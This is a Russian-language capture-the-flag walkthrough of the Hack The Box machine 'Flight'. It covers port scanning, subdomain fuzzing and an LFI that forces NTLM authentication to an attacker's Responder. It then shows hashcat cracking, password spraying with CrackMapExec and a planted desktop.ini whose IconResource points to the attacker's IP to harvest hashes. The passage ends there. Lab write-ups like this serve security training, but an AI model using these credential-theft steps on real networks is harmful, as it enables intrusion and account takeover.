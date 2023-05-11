В этом рай­тапе я покажу, как похищать пароли поль­зовате­лей Windows раз­ными спо­соба­ми, пос­ле чего мы зах­ватим веб‑сер­вер, прой­дя по цепоч­ке уяз­вимос­тей, которые поз­волят нам раз за разом повышать при­виле­гии.

На­ша цель — получить пра­ва супер­поль­зовате­ля на тре­ниро­воч­ной машине Flight с пло­щад­ки Hack The Box. Машина оце­нена как слож­ная.

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в / etc/ hosts :

10. 10. 11. 187 flight. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та: #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr '\ n' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

В резуль­татах ска­ниро­вания видим мно­го откры­тых пор­тов, что типич­но для Windows:

53 — служ­ба DNS;

80 (HTTP) — веб‑сер­вер Apache 2.4.52;

88 — служ­ба Kerberos;

135 — служ­ба уда­лен­ного вызова про­цедур (Microsoft RPC). Исполь­зует­ся для опе­раций вза­имо­дей­ствия кон­трол­лер — кон­трол­лер и кон­трол­лер — кли­ент;

139 — служ­ба сеан­сов NetBIOS, NetLogon;

389 — служ­ба LDAP;

445 — служ­ба SMB;

464 — служ­ба сме­ны пароля Kerberos;

593 (HTTP/RPC/EPMAP) — исполь­зует­ся в служ­бах DCOM и MS Exchange;

636 — LDAP с шиф­ровани­ем SSL или TLS;

3268 (LDAP) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру;

3269 (LDAPS) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру через защищен­ное соеди­нение;

5985 — служ­ба уда­лен­ного управле­ния WinRM;

9389 — веб‑служ­бы AD DS.

Ано­ним­ная аутен­тифика­ция ниг­де не дос­тупна, поэто­му идем на веб‑сер­вер.

Точка входа

На стар­товой стра­нице ничего най­ти не уда­лось, поэто­му необ­ходимо рас­ширить область тес­тирова­ния. Самый оче­вид­ный спо­соб — перебо­ром поис­кать скры­тые домены и катало­ги. Я это делаю при помощи ска­нера ffuf.

Справка: сканирование веба c ffuf Од­но из пер­вых дей­ствий при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов, что­бы най­ти скры­тую информа­цию и недос­тупные обыч­ным посети­телям фун­кции. Для это­го мож­но исполь­зовать прог­раммы вро­де dirsearch и DIRB. Я пред­почитаю лег­кий и очень быс­трый ffuf. При запус­ке ука­зыва­ем сле­дующие парамет­ры: -w — сло­варь (я исполь­зую сло­вари из набора SecLists);

— сло­варь (я исполь­зую сло­вари из набора SecLists); -t — количес­тво потоков;

— количес­тво потоков; -u — URL;

— URL; -fs — филь­тр, исклю­чающий стра­ницы по раз­меру;

— филь­тр, исклю­чающий стра­ницы по раз­меру; -H — HTTP-заголо­вок. Мес­то перебо­ра помеча­ем сло­вом FUZZ.

Ко­ман­да получа­ется сле­дующая:

ffuf -u 'http:// flight. htb' -w subdomains- top1million- 110000. txt -H "Host: FUZZ. flight. htb" -t 256 --fs 7069

На­ходим новый под­домен и вно­сим его в файл / etc/ hosts .

10. 10. 11. 187 flight. htb school. flight. htb

Об­рати вни­мание, что заг­ружа­емая стра­ница ука­зыва­ется в качес­тве парамет­ра view . Про­верим, нет ли здесь уяз­вимос­ти LFI, и ука­жем в парамет­ре view файл index. php .

http:/ / school. flight. htb/ index. php? view = index. php

Ви­дим на стра­нице какой‑то код на PHP. Сто­ит озна­комить­ся с ним поб­лиже.

Мы узна­ем путь к фай­лам сай­та, а так­же исполь­зуемые для обра­бот­ки парамет­ра филь­тры. Так как не филь­тру­ется пос­ледова­тель­ность / / , мы можем зас­тавить веб‑сер­вер обра­тить­ся к любому уда­лен­ному сер­веру. При этом Windows попыта­ется авто­ризо­вать­ся на ука­зан­ном ресур­се, и мы получим NetNTLMv2-хеш пароля поль­зовате­ля веб‑сер­вера. Что­бы ловить такие хеши, запус­каем на локаль­ном хос­те ути­литу Responder.

sudo responder -v -I tun0

Те­перь ука­зыва­ем свой адрес и ловим хеш.

http:/ / school. flight. htb/ index. php? view = / / 10. 10. 14. 16/ share

От­прав­ляем хеш на перебор, в качес­тве режима hashcat (параметр -m ) ука­зыва­ем 5600, соот­ветс­тву­ющий хешу NetNTLMv2.

hashcat -m 5600 5600. hash rockyou. txt

Про­веря­ем учет­ные дан­ные на при­мере служ­бы SMB с помощью CrackMapExec.

crackmapexec smb 10. 10. 11. 187 -u svc_ apache -p 'S@Ss!K@*t13'

Учет­ные дан­ные вер­ны, поэто­му получа­ем дос­тупные сетевые ресур­сы и спи­сок поль­зовате­лей.

crackmapexec smb 10. 10. 11. 187 -u svc_ apache -p 'S@Ss!K@*t13' --users --shares

Точка опоры

Да­вай под­клю­чим­ся к обще­му ресур­су Web и прос­мотрим его содер­жимое.

impacket- smbclient flight. htb/ svc_ apache: 'S@Ss!K@*t13' @10. 10. 11. 187

Ни­чего, кро­ме катало­гов сай­тов, там не находим. Одна­ко текущая учет­ная запись — слу­жеб­ная, и у поль­зовате­ля, ско­рее все­го, есть еще и основная. Поп­робу­ем зай­ти в дру­гие учет­ки с тем же паролем.

crackmapexec smb 10. 10. 11. 187 -u users. txt -p 'S@Ss!K@*t13' --continue-on-success

По­луча­ем еще одну под­кон­троль­ную учет­ную запись. Теперь про­веря­ем, какие общие катало­ги дос­тупны новому поль­зовате­лю.

crackmapexec smb 10. 10. 11. 187 -u 'S. Moon' -p 'S@Ss!K@*t13' --shares

Для записи дос­тупен каталог Shared . Боль­ше ничего най­ти не уда­лось, ресурс ока­зал­ся пус­тым. Тог­да воз­никла идея похитить NetNTLMv2-пароли дру­гим спо­собом. В этот раз будем исполь­зовать файл desktop. ini , в котором параметр IconResource ука­зыва­ет на наш внеш­ний ресурс.

[ . ShellClassInfo] IconResource = \ \ 10. 10. 14. 51 \ s hare

Лю­бой поль­зователь, который прос­мотрит этот каталог, авто­мати­чес­ки обра­тит­ся к нашему ресур­су и при этом пре­дос­тавит учет­ные дан­ные.